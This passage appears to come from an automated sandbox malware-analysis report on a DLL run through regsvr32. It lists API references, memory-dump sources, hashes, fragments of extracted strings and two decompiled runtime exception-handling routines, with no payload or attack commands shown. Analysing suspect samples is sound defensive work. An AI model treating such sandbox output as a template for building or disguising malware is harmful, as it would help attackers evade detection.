GetLastError.KERNEL32 ref: 00000001800146A6
ShowWindow.USER32 ref: 00000001800146B0
GetLastError.KERNEL32 ref: 00000001800146BA
ShowWindow.USER32 ref: 00000001800146C4
GetLastError.KERNEL32 ref: 00000001800146CE
ShowWindow.USER32 ref: 00000001800146D8
GetLastError.KERNEL32 ref: 00000001800146E2
ShowWindow.USER32 ref: 00000001800146EC
GetLastError.KERNEL32 ref: 00000001800146F6
ShowWindow.USER32 ref: 0000000180014700
GetLastError.KERNEL32 ref: 000000018001470A
ShowWindow.USER32 ref: 0000000180014714
GetLastError.KERNEL32 ref: 000000018001471E
ShowWindow.USER32 ref: 0000000180014728
GetLastError.KERNEL32 ref: 0000000180014732
ShowWindow.USER32 ref: 000000018001473C
GetLastError.KERNEL32 ref: 0000000180014746
ShowWindow.USER32 ref: 0000000180014750
GetLastError.KERNEL32 ref: 000000018001475A
ShowWindow.USER32 ref: 0000000180014764
GetLastError.KERNEL32 ref: 000000018001476E
ShowWindow.USER32 ref: 0000000180014778
GetLastError.KERNEL32 ref: 0000000180014782
ShowWindow.USER32 ref: 000000018001478C
GetLastError.KERNEL32 ref: 0000000180014796
ShowWindow.USER32 ref: 00000001800147A0
GetLastError.KERNEL32 ref: 00000001800147AA
ShowWindow.USER32 ref: 00000001800147B4
GetLastError.KERNEL32 ref: 00000001800147BE
ShowWindow.USER32 ref: 00000001800147C8
GetLastError.KERNEL32 ref: 00000001800147D2
ShowWindow.USER32 ref: 00000001800147DC
GetLastError.KERNEL32 ref: 00000001800147E6
ShowWindow.USER32 ref: 00000001800147F0
GetLastError.KERNEL32 ref: 00000001800147FA
ShowWindow.USER32 ref: 0000000180014804
GetLastError.KERNEL32 ref: 000000018001480E
ShowWindow.USER32 ref: 0000000180014818
GetLastError.KERNEL32 ref: 0000000180014822
ShowWindow.USER32 ref: 000000018001482C
GetLastError.KERNEL32 ref: 0000000180014836
ShowWindow.USER32 ref: 0000000180014840
GetLastError.KERNEL32 ref: 000000018001484A
ShowWindow.USER32 ref: 0000000180014854
GetLastError.KERNEL32 ref: 000000018001485E
ShowWindow.USER32 ref: 0000000180014868
GetLastError.KERNEL32 ref: 0000000180014872
ShowWindow.USER32 ref: 000000018001487C
GetLastError.KERNEL32 ref: 0000000180014886
ShowWindow.USER32 ref: 0000000180014890
GetLastError.KERNEL32 ref: 000000018001489A
ShowWindow.USER32 ref: 00000001800148A4
GetLastError.KERNEL32 ref: 00000001800148AE
ShowWindow.USER32 ref: 00000001800148B8
GetLastError.KERNEL32 ref: 00000001800148C2
ShowWindow.USER32 ref: 00000001800148CC
GetLastError.KERNEL32 ref: 00000001800148D6
ShowWindow.USER32 ref: 00000001800148E0
GetLastError.KERNEL32 ref: 00000001800148EA
ShowWindow.USER32 ref: 00000001800148F4
GetLastError.KERNEL32 ref: 00000001800148FE
ShowWindow.USER32 ref: 0000000180014908
GetLastError.KERNEL32 ref: 0000000180014912
ShowWindow.USER32 ref: 000000018001491C
GetLastError.KERNEL32 ref: 0000000180014926
ShowWindow.USER32 ref: 0000000180014930
GetLastError.KERNEL32 ref: 000000018001493A
ShowWindow.USER32 ref: 0000000180014944
GetLastError.KERNEL32 ref: 000000018001494E
ShowWindow.USER32 ref: 0000000180014958
GetLastError.KERNEL32 ref: 0000000180014962
ShowWindow.USER32 ref: 000000018001496C
GetLastError.KERNEL32 ref: 0000000180014976
ShowWindow.USER32 ref: 0000000180014980
GetLastError.KERNEL32 ref: 000000018001498A
ShowWindow.USER32 ref: 0000000180014994
GetLastError.KERNEL32 ref: 000000018001499E
ShowWindow.USER32 ref: 00000001800149A8
GetLastError.KERNEL32 ref: 00000001800149B2
ShowWindow.USER32 ref: 00000001800149BC
GetLastError.KERNEL32 ref: 00000001800149C6
ShowWindow.USER32 ref: 00000001800149D0
GetLastError.KERNEL32 ref: 00000001800149DA
ShowWindow.USER32 ref: 00000001800149E4
GetLastError.KERNEL32 ref: 00000001800149EE
ShowWindow.USER32 ref: 00000001800149F8
GetLastError.KERNEL32 ref: 0000000180014A02
ShowWindow.USER32 ref: 0000000180014A0C
GetLastError.KERNEL32 ref: 0000000180014A16
ShowWindow.USER32 ref: 0000000180014A20
GetLastError.KERNEL32 ref: 0000000180014A2A
ShowWindow.USER32 ref: 0000000180014A34
GetLastError.KERNEL32 ref: 0000000180014A3E
ShowWindow.USER32 ref: 0000000180014A48
GetLastError.KERNEL32 ref: 0000000180014A52
ShowWindow.USER32 ref: 0000000180014A5C
GetLastError.KERNEL32 ref: 0000000180014A66
ShowWindow.USER32 ref: 0000000180014A70
GetLastError.KERNEL32 ref: 0000000180014A7A
ShowWindow.USER32 ref: 0000000180014A84
GetLastError.KERNEL32 ref: 0000000180014A8E
ShowWindow.USER32 ref: 0000000180014A98
GetLastError.KERNEL32 ref: 0000000180014AA2
ShowWindow.USER32 ref: 0000000180014AAC
GetLastError.KERNEL32 ref: 0000000180014AB6
ShowWindow.USER32 ref: 0000000180014AC0
GetLastError.KERNEL32 ref: 0000000180014ACA
ShowWindow.USER32 ref: 0000000180014AD4
GetLastError.KERNEL32 ref: 0000000180014ADE
ShowWindow.USER32 ref: 0000000180014AE8
GetLastError.KERNEL32 ref: 0000000180014AF2

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorLastShowWindow
String ID:
API String ID: 3252650109-0
Opcode ID: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
Instruction ID: 20d447c0f35bcb8e3c3c297cfd2fae4a36a0868fd259666119818285c186e9df
Opcode Fuzzy Hash: 9a665b6fd1606399514c88e51871797ade4cb1dce934726ac272da09cbabfbb3
Instruction Fuzzy Hash: B522B976B00E0986FBDB9F72AC1439B22A2AB8CBD5F46C439E40689174DE7DC75D8305

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001C48 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000000180001C64
RtlCaptureContext.NTDLL ref: 0000000180001C91
RtlLookupFunctionEntry.NTDLL ref: 0000000180001CAB
RtlVirtualUnwind.NTDLL ref: 0000000180001CEC
IsDebuggerPresent.KERNEL32 ref: 0000000180001D40
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000180001D61
UnhandledExceptionFilter.KERNEL32 ref: 0000000180001D6C

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
Instruction ID: 43a781f402e08a9585d1bfd569913690a5560a40171371ec2054230cf506bc92
Opcode Fuzzy Hash: 1ffe1e744cccfe4686aba7d6a8aca853fc79a5f69e58afced9d2bc9442cc5b87
Instruction Fuzzy Hash: 1931FB72605B848AEBA1DF60E8507EE7365F788785F44842AEB4E47A99DF38C74CC710

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800082EC Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E000000011800082EC(void* __ecx, intOrPtr __edx, long long __rbx, long long __rsi) {
				void* _t36;
				int _t38;
				signed long long _t60;
				long long _t63;
				_Unknown_base(*)()* _t82;
				void* _t86;
				void* _t87;
				void* _t89;
				signed long long _t90;
				struct _EXCEPTION_POINTERS* _t95;

				 *((long long*)(_t89 + 0x10)) = __rbx;
				 *((long long*)(_t89 + 0x18)) = __rsi;
				_t87 = _t89 - 0x4f0;
				_t90 = _t89 - 0x5f0;
				_t60 =  *0x80021010; // 0xe153c63ea8e4
				 *(_t87 + 0x4e0) = _t60 ^ _t90;
				if (__ecx == 0xffffffff) goto 0x8000832b;
				E00000001180001C40(_t36);
				r8d = 0x98;
				E00000001180002680();
				r8d = 0x4d0;
				E00000001180002680();
				 *((long long*)(_t90 + 0x48)) = _t90 + 0x70;
				_t63 = _t87 + 0x10;
				 *((long long*)(_t90 + 0x50)) = _t63;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t63 == 0) goto 0x800083be;
				 *(_t90 + 0x38) =  *(_t90 + 0x38) & 0x00000000;
				 *((long long*)(_t90 + 0x30)) = _t90 + 0x58;
				 *((long long*)(_t90 + 0x28)) = _t90 + 0x60;
				 *((long long*)(_t90 + 0x20)) = _t87 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t87 + 0x108)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x70)) = __edx;
				 *((long long*)(_t87 + 0xa8)) = _t87 + 0x510;
				 *((long long*)(_t87 - 0x80)) =  *((intOrPtr*)(_t87 + 0x508));
				 *((intOrPtr*)(_t90 + 0x74)) = r8d;
				_t38 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t82, _t86);
				if (UnhandledExceptionFilter(_t95) != 0) goto 0x80008420;
				if (_t38 != 0) goto 0x80008420;
				if (__ecx == 0xffffffff) goto 0x80008420;
				return E000000011800010B0(E00000001180001C40(_t40), __ecx,  *(_t87 + 0x4e0) ^ _t90);
			}

0x1800082ec
0x1800082f1
0x1800082fa
0x180008302
0x180008309
0x180008313
0x180008324
0x180008326
0x180008332
0x180008338
0x180008343
0x180008349
0x180008353
0x18000835c
0x180008360
0x180008365
0x18000837a
0x18000837d
0x180008386
0x180008388
0x18000839b
0x1800083a8
0x1800083b1
0x1800083b8
0x1800083c5
0x1800083d7
0x1800083db
0x1800083e9
0x1800083ed
0x1800083f1
0x1800083fb
0x18000840e
0x180008412
0x180008417
0x180008446

APIs

RtlCaptureContext.NTDLL ref: 0000000180008365
RtlLookupFunctionEntry.NTDLL ref: 000000018000837D
RtlVirtualUnwind.NTDLL ref: 00000001800083B8
IsDebuggerPresent.KERNEL32 ref: 00000001800083F1
SetUnhandledExceptionFilter.KERNEL32 ref: 00000001800083FB
UnhandledExceptionFilter.KERNEL32 ref: 0000000180008406

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
Instruction ID: d6e40695d6015e5c843dff92317e70983bbd332ebd8c23179410134a75d63e3d
Opcode Fuzzy Hash: d0fc5085bf44c4937be082645d9f0fd030d92464e7166f1adeb9fe9a04ad5cc9
Instruction Fuzzy Hash: 7E315032604F8486DBA1CF25E8407DE73A4F788798F544116FA9D43B59DF38C259CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0128F8C4 Relevance: 6.6, Strings: 5, Instructions: 393COMMON

Download Yara Rule

Strings

G]W2, xrefs: 0128FE0A
n, xrefs: 0128FAEB
Uf, xrefs: 0128FDA2
X2D7, xrefs: 0128F947
Wlw, xrefs: 0128FD4C

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: G]W2$Uf$Wlw$X2D7$n
API String ID: 0-182303197
Opcode ID: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
Instruction ID: f9e1136821e23e9cab6a366501c81a02ba4083cf86b46f4761bc6f0676ac2c00
Opcode Fuzzy Hash: 5ce9af85c0101b92db01bf743a5277ddb3699d4210e4094ad3775c6a215530db
Instruction Fuzzy Hash: C3121770A14709EFDB58DF68C18A99EBBF1FF48304F40816DE84AAB290D775DA18CB45

Uniqueness

Uniqueness Score: -1.00%

Function 01295384 Relevance: 6.6, Strings: 5, Instructions: 313COMMON

Download Yara Rule

Strings

M/uB, xrefs: 01295729
Q|-, xrefs: 0129580C
GK, xrefs: 01295653
Bt$, xrefs: 01295461
~~K, xrefs: 01295842

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: GK$M/uB$Q|-$~~K$Bt$
API String ID: 0-557373213
Opcode ID: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
Instruction ID: 99ce7c16af4ba43fb7244ed68d2bb37c29c0ef0bcfa141a87bfd25fde737d47c
Opcode Fuzzy Hash: 5399f6d2f4ddd76430553fcbb3a69801bb23c4fdd32863c07da465c7968e24a8
Instruction Fuzzy Hash: 0BE1F17551260DCBDF68DF38C0994D93BE1FF58308F61122AFC66AA2A2DBB4D514CB48

Uniqueness

Uniqueness Score: -1.00%

Function 01288378 Relevance: 6.5, Strings: 5, Instructions: 238COMMON

Download Yara Rule

Strings

.I, xrefs: 01288439
gBfh, xrefs: 012883D0
w|, xrefs: 01288634
{, xrefs: 01288649
i[, xrefs: 0128867B

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .I$gBfh$i[$w|${
API String ID: 0-448909954
Opcode ID: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
Instruction ID: 8b3da1d7ddd55814151d924e74e25188e6519132ad580ef4b2c1fa8f4bf18de8
Opcode Fuzzy Hash: fd252399347da21463b78aeaa0d34fc6630a10d5928b5024a52fe33a2729c415
Instruction Fuzzy Hash: 31B12670D207499FDB88DFA9D8898DDBBF0FB48304F40921DE816AB290C778A945CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0129610C Relevance: 6.5, Strings: 5, Instructions: 208COMMON

Download Yara Rule

Strings

cp, xrefs: 0129627B
x, xrefs: 012963D0
Kn#, xrefs: 012961C9
zu, xrefs: 012961F7
vm, xrefs: 0129634F

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: cp$vm$x$zu$Kn#
API String ID: 0-3521309225
Opcode ID: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
Instruction ID: 7cec907919776e486fa91b156c7e76e9cc0adc166a0c22214a56b34e92b39f2f
Opcode Fuzzy Hash: 854233274bfaeff89ac29a935d156dc1944753dcbd55c44e864b2476cdfcfe8d
Instruction Fuzzy Hash: 8AA1F1B0D143198BDF58CFA9D88A8EEBBF0FB58314F108219E855B6290D3789945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 01297518 Relevance: 6.3, Strings: 5, Instructions: 87COMMON

Download Yara Rule

Strings

0T, xrefs: 012975D1
lXjD, xrefs: 01297598
#0FQ, xrefs: 012975F5
tS, xrefs: 01297639
C;, xrefs: 012975B8

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #0FQ$0T$C;$lXjD$tS
API String ID: 0-817034907
Opcode ID: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
Instruction ID: ee865afac8a639059a43e57f59529887a04cfe2cb0f14027a9044df562a83fdd
Opcode Fuzzy Hash: e4bf78acd7a5f6a30f384b9d32d43fdeffbe4641104b903a1cc162fefd21facd
Instruction Fuzzy Hash: 124192B180034E8FDB44DF64D88A4CE7FF0FB68398F215619E859A6250D3B89694CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0128975C Relevance: 6.3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

Strings

,, xrefs: 012897CB
l, xrefs: 012897B1
Rc, xrefs: 01289782
D-, xrefs: 0128984C
3T, xrefs: 01289861

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,$3T$D-$Rc$l
API String ID: 0-617906138
Opcode ID: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
Instruction ID: ed0b81f48b1eb989f24cd4500b9ee10488474574ed01d330781d105b4dc309eb
Opcode Fuzzy Hash: 3a3cf95294224deb7faeda9f3e638283c88744c906ce2ff68bf076d4943cea68
Instruction Fuzzy Hash: 3941D5B081078E8FDB44DF64D88A4DE7BF0FB58358F104619E869A6260D3B89664CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001D98 Relevance: 6.0, APIs: 4, Instructions: 39
timethreadCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00000001180001D98(long long __rbx, long long _a32) {

				_a32 = __rbx;
			}

0x180001d98

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180001DC4
GetCurrentThreadId.KERNEL32 ref: 0000000180001DD2
GetCurrentProcessId.KERNEL32 ref: 0000000180001DDE
QueryPerformanceCounter.KERNEL32 ref: 0000000180001DEE

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
Instruction ID: 8b5b8807919832646eb0d744692d73e0514a3f66bd27872d13ad1b0d2e18aa1e
Opcode Fuzzy Hash: 435d845f9f5cdf73bfe4695b71b0048b28e79a424c4651dbd907605b843c4427
Instruction Fuzzy Hash: E6113C32600F449AEB52CF61EC943D833A4F31D799F041A25FAAD477A4DF78C2A88340

Uniqueness

Uniqueness Score: -1.00%

Function 0129CF70 Relevance: 5.4, Strings: 4, Instructions: 410COMMON

Download Yara Rule

Strings

#X, xrefs: 0129D3DB
, xrefs: 0129D0A7
y4.), xrefs: 0129D445
UCV, xrefs: 0129D433

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$ $UCV$y4.)
API String ID: 0-917551206
Opcode ID: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
Instruction ID: 88ea490b5e8eb5b8c264db24aba5282f771c7b24d400d0cc54d06fa606c66875
Opcode Fuzzy Hash: 28325ea241be474c5b5558c29b1591e9c0afa6bd6a02919fad3fbb937fa4a7d1
Instruction Fuzzy Hash: CC12D4B1A0470D9BDF58DFA8E08A4DDBBF2FB58344F00412EEA06A7290D7B5D819CB55

Uniqueness

Uniqueness Score: -1.00%

Function 01284EB8 Relevance: 5.4, Strings: 4, Instructions: 386COMMON

Download Yara Rule

Strings

#X, xrefs: 0128521E
tL>, xrefs: 01285068
rq%, xrefs: 012852CE
"., xrefs: 0128533A

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$rq%$tL>$".
API String ID: 0-3922733902
Opcode ID: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
Instruction ID: a88a23d1c0db03471fda986717b917d13b5e37c4146961d6b595272a9385b66c
Opcode Fuzzy Hash: e7bca3236e2c6002a46b032ca93679f7d95ede6d4010d0837b1e0abab37f6438
Instruction Fuzzy Hash: C822D1709196C98BDBF8DF24C8896DD37F0FF48344F90125AD84E9A694DBB86684CF42

Uniqueness

Uniqueness Score: -1.00%

Function 0129AD28 Relevance: 5.2, Strings: 4, Instructions: 205COMMON

Download Yara Rule

Strings

-, xrefs: 0129AE56
g, xrefs: 0129AE44
HE, xrefs: 0129AFE0
Vc, xrefs: 0129AE8C

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: g$-$HE$Vc
API String ID: 0-2562162751
Opcode ID: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
Instruction ID: 95118a53b42cbe022e668f729a4b0a1903d7e117f35ed78488b23a3e58f10a28
Opcode Fuzzy Hash: f3d5559af2bde6194e80210adddbbaf8e95cb0bc6a16661ffa1dd3a57d8e1344
Instruction Fuzzy Hash: 8CA1E2B150478D9FDB88CF28D8894DD3BB2FB583A8F505219FC4A87260D7B8D985CB85

Uniqueness

Uniqueness Score: -1.00%

Function 012880CC Relevance: 5.2, Strings: 4, Instructions: 163COMMON

Download Yara Rule

Strings

*%, xrefs: 01288281
he, xrefs: 0128814E
(;, xrefs: 012882E2
*i, xrefs: 012880E7

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: (;$*i$he$*%
API String ID: 0-35414758
Opcode ID: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
Instruction ID: 8221677da0fb988a2e6e67dc8bf57a3071b298ba5366db68535ed03cadb5e681
Opcode Fuzzy Hash: 8b9c9bfbfb1498278ba2aeeef8e78c7341b02e7a1b6eacef6973ad54d80d413a
Instruction Fuzzy Hash: CF714870514349DBEF48DF28C88A5DD3FA1FB08358F565319FD4AA6290C7B8D484CB89

Uniqueness

Uniqueness Score: -1.00%

Function 0128D474 Relevance: 5.1, Strings: 4, Instructions: 136COMMON

Download Yara Rule

Strings

(, xrefs: 0128D533
I, xrefs: 0128D66B
*/, xrefs: 0128D623
Yu, xrefs: 0128D5D1

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: */$I$Yu$(
API String ID: 0-674225443
Opcode ID: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
Instruction ID: 8f2c2814a88f36d2cd245d90c3d9528102c8f685bc9c5c448f22b4a5bfac468b
Opcode Fuzzy Hash: 2498b6af7a2ed30e90db0a3e12568d2f4136c2386795e8cd742b44945e36b51d
Instruction Fuzzy Hash: 8A719DB180030ACFDB58CF68D48A5DE7FB0FB68398F204219E85596260D7B49AA5CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 012814D4 Relevance: 5.1, Strings: 4, Instructions: 117COMMON

Download Yara Rule

Strings

PYq|, xrefs: 012A5812
.:, xrefs: 012A57E4
W, xrefs: 01281581
#X, xrefs: 01281535

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$.:$PYq|$W
API String ID: 0-626586655
Opcode ID: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
Instruction ID: 2e2e97b6ecc59cc7a71deb6dcb7cf173be931ede1ebc688832a4e0d3fea1e377
Opcode Fuzzy Hash: 21991bcfd0f912b097b6461d75a60c549d6ff57ca2b273beb0e746897d976d77
Instruction Fuzzy Hash: 5F41047062CB858FD7A8DF28C58A65BBBF0FBD9704F804A1EE589C7250DB749804CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0128A660 Relevance: 5.1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

Strings

a:, xrefs: 0128A76D
P, xrefs: 0128A670
5`, xrefs: 0128A677
<ml, xrefs: 0128A697

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5`$<ml$a:$P
API String ID: 0-330785107
Opcode ID: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
Instruction ID: e14505e3db30f29a15265d5cfefcd6d39af9a43dfeb7be48d897b7727370e5bb
Opcode Fuzzy Hash: cbd383124c860a9d8e400423fa4c9196148af7f7093da0234d577b407377b911
Instruction Fuzzy Hash: 3141F4B190074E8BDB48DF68C48A49E7FB1FB58348F10861DE8569A390E7B89664CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 01294A90 Relevance: 5.1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

Strings

S, xrefs: 01294B8E
0u, xrefs: 01294AA7
e!, xrefs: 01294BE7
-+, xrefs: 01294B75

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -+$0u$S$e!
API String ID: 0-4217091389
Opcode ID: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
Instruction ID: bf71f39b6a889aa0914c2cdffaf4e0bddea45af324700ccbb25d8e1da6afe35b
Opcode Fuzzy Hash: 96b86808421bf99806c252c8d8da0d71d9c96e1238819cdefd32f8fbf4f8ccc7
Instruction Fuzzy Hash: A541E3B090474A8FDB48DF64C89A5DE7FF0FB68388F20461DF81AA6250D37496A4CBD5

Uniqueness

Uniqueness Score: -1.00%

Function 01283274 Relevance: 5.1, Strings: 4, Instructions: 81COMMON

Download Yara Rule

Strings

SJ, xrefs: 01283292
"B, xrefs: 012832CE
o, xrefs: 012832EB
wU, xrefs: 0128335D

Memory Dump Source

Source File: 0000000C.00000002.320951815.0000000001281000.00000020.00001000.00020000.00000000.sdmp, Offset: 01281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_1281000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: o$"B$SJ$wU
API String ID: 0-691100934
Opcode ID: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
Instruction ID: 83960510b759ac03a5b38df917c7580cdff57145eae2dcb1681c3c345c7f174d
Opcode Fuzzy Hash: aed5e06b6c4a71d08a3525650badbc70dff16501ab02106ea58e4e5589b648c2
